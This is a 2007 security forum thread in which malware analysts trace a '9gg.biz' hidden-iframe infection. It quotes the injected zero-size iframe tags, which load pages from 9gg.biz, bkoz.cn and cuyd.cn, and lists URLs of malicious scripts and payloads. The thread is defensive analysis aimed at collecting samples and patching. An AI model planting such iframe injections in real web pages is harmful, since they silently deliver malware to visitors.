CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

Donation/Premium
spacer
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
spacer spacer

NEW! 9gg.biz IFRAME exploit virus

 
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
reportingFromChina

Trooper
Trooper


Joined: Sep 26, 2007
Posts: 20
Location: China

PostPosted: Wed Dec 19, 2007 12:48 pm    Post subject: NEW! 9gg.biz IFRAME exploit virus
Reply with quote

A new virus has hit the virus-riddled school I teach at in China. Like the '31joy.com/rb.vg' viruses back in September, it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

It inserts this malicious code at the top of pages:

<iframe src=hxxp://9gg.biz/ width=0 height=0 frameborder=0></iframe>

I haven't dug any deeper than that, but from the browser status bar I can see that bkoz.cn is also accessed.

Searching google for '9gg.biz', it looks like this is pretty new. No English-language posts about it any earlier than December.

RFC

Back to top
View users profile Send private message
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Wed Dec 19, 2007 3:29 pm    Post subject:
Reply with quote

If you visit the site in the iframe it tries to load 4 more iframes.

index.html - Tries to take advantage of an exploit in Real Player.

2.htm - Uses some .js files (I'll grab these as well) and tries to download 4.CAB (on the same domain) and from 4.cab run bd.exe

xl.htm - Does something.

stat.php - Appears to record stats on who is visiting the page.

I'll grab all the files I can and add the files to the malware listserv.

http://www.siteadvisor.com/sites/9gg.biz/


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Wed Dec 19, 2007 3:51 pm    Post subject:
Reply with quote

Is your AV able to remove it ok?

If you have XP try installing Windows Defender.

If you have Real Player installed update it to the latest version or uninstall it if you don't need it.

Do the PCs have all the updates from Windows Update?


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
MAPKOBKA

Lieutenant
Lieutenant
Premium Member

Joined: Jul 04, 2007
Posts: 163

Premium

PostPosted: Wed Dec 19, 2007 4:52 pm    Post subject:
Reply with quote

Hi Tetak,

xl.htm - IEslice exploit + iframe:
<iFrAmE SRc=http://www.bkoz.cn/seo.htm width=0 height=0 frameborder=0></IfRaMe>

which leads onto

<iFrAmE SRc=http://www.cuyd.cn/seo.htm width=0 height=0 frameborder=0></IfRaMe>

Also tries to download

hxxp://9gg.biz/4.CAB


Have found the following malicious scripts, grab them and up to the listserv if you can:


htxp://9gg.biz/MPS.js
htxp://9gg.biz/PowerPlayerCtrl.js
htxp://9gg.biz/0614.js


_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
Back to top
View users profile Send private message Visit posters website
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Wed Dec 19, 2007 6:42 pm    Post subject:
Reply with quote

Thanks MAPKOBKA.

The 2 xl.htm iframes seem to link to each other so I couldn't get anything from them.

I got 4.CAB, opening it crashed explorer but I was able to extract the 1 .exe file in it.

All the files I found, including the .js files have been processed.


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
MAPKOBKA

Lieutenant
Lieutenant
Premium Member

Joined: Jul 04, 2007
Posts: 163

Premium

PostPosted: Wed Dec 19, 2007 7:21 pm    Post subject:
Reply with quote

Cool...

I had a near miss with the realplayer exploit, the blerdy thing tried to execute outside of my sandbox (driver error) ....luckily it asked before execution and I don't have any kind of realexploitplayer installed Smile


_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
Back to top
View users profile Send private message Visit posters website
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Wed Dec 19, 2007 8:07 pm    Post subject:
Reply with quote

I didn't think I had RealEasytoExploit player installed but when I was installing the latest version of the codec pack I use today I noticed it also installs the codecs for Real Player. Luckily it doesn't include QuickAndEasyToExploitTime so I was ok there.

Un-installing it right now...


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
MAPKOBKA

Lieutenant
Lieutenant
Premium Member

Joined: Jul 04, 2007
Posts: 163

Premium

PostPosted: Sat Dec 22, 2007 11:34 pm    Post subject:
Reply with quote

Tetak, there also seems to be a /real.exe on that website, care to grab that one for the listserv too? Smile


Cheers mate.


_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
Back to top
View users profile Send private message Visit posters website
tetak

MIRT Team Lead
Premium Member

Joined: Jan 19, 2007
Posts: 5878

MIRT Premium

PostPosted: Sat Dec 22, 2007 11:53 pm    Post subject:
Reply with quote

Real.exe - Result: 25/32 (78.13%)

I've manually sent it to Kaspersky as they don't currently detect it.


_________________
Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.

Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
Back to top
View users profile Send private message
Evilcry

Trooper
Trooper


Joined: Aug 30, 2007
Posts: 11
Location: Italy

PostPosted: Sun Dec 23, 2007 11:03 am    Post subject:
Reply with quote

Hi,

Real.exe is Win32.Worm.Cekar

Regards,
Evilcry

Back to top
View users profile Send private message Visit posters website
MAPKOBKA

Lieutenant
Lieutenant
Premium Member

Joined: Jul 04, 2007
Posts: 163

Premium

PostPosted: Sun Dec 23, 2007 11:47 am    Post subject:
Reply with quote

Thanks for sending it. I hadn't realised it was so well detected.


_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
Back to top
View users profile Send private message Visit posters website
reportingFromChina

Trooper
Trooper


Joined: Sep 26, 2007
Posts: 20
Location: China

PostPosted: Wed Jan 09, 2008 5:31 am    Post subject:
Reply with quote

Tetak asked, "Do the PCs have all the updates from Windows Update?"

I thought it was worth explaining the environment I teach in here, to give some idea of why this is such fertile ground for malware.

This is a large school with at least 1000PCs I'd guess. The organization I work for just rents space from a public Chinese school. However our internet connection routes through them, and we share network resources with them. So it's not possible to ensure that all machines on the local network are fully up to date. In fact, I'm sure that large numbers of them are not.

Now add to that the prevailing cultural attitude here - that it's only worth paying attention to viruses when they've made a machine so slow it's inoperable. And you can begin to see why here, we are 'early adopters' of new malware Wink

Back to top
View users profile Send private message
Display posts from previous:   
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links All times are GMT
Page 1 of 1

 
Quick Reply:
Username: 

Quote the last message
Attach signature (signatures can be changed in profile)
 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001 phpBB Group
spacer spacer